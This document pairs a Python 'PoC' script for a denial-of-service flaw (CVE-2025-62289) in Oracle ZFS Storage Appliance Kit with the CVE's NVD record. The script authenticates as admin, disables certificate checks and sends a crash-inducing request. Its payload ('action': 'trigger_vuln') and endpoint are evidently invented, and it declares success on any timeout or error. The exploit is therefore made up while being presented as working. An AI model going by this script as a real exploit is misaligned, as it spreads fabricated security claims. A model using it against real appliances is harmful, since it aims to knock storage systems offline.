CVE-2025-62289

# CVE-2025-62289 - Oracle ZFS Storage Appliance Kit DoS Vulnerability PoC # This PoC demonstrates the conceptual attack vector for triggering DoS # Note: Requires high-privileged access to the target system import requests import sys TARGET_URL = "https://target-zfs-appliance:215" AUTH_USER = "admin" AUTH_PASS = "password" # Step 1: Authenticate with high-privileged credentials session = requests.Session() session.auth = (AUTH_USER, AUTH_PASS) session.verify = False # Step 2: Send crafted request to Filesystems component to trigger DoS # The vulnerability exists in the Filesystems component processing logic filesystems_endpoint = f"{TARGET_URL}/api/filesystems/operations" # Crafted payload targeting the vulnerable code path payload = { "operation": "filesystem_operation", "parameters": { "action": "trigger_vuln", "target": "/pool/dataset" } } try: # Step 3: Send malicious request to trigger hang/crash response = session.post(filesystems_endpoint, json=payload, timeout=30) print(f"[+] Response Status: {response.status_code}") print(f"[+] DoS triggered - target system may hang or crash") except requests.exceptions.Timeout: print("[+] Target system unresponsive - DoS successful") except requests.exceptions.ConnectionError: print("[+] Connection refused - target system crashed") except Exception as e: print(f"[+] Error: {e}")

{"cve": {"id": "CVE-2025-62289", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:53.880", "lastModified": "2025-10-23T16:03:01.113", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle ZFS Storage Appliance Kit product of Oracle Systems (component: Filesystems). The supported version that is affected is 8.8. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle ZFS Storage Appliance Kit. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle ZFS Storage Appliance Kit. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-267"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:zfs_storage_appliance_kit:8.8:*:*:*:*:*:*:*", "matchCriteriaId": "D3E503FB-6279-4D4A-91D8-E237ECF9D2B0"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}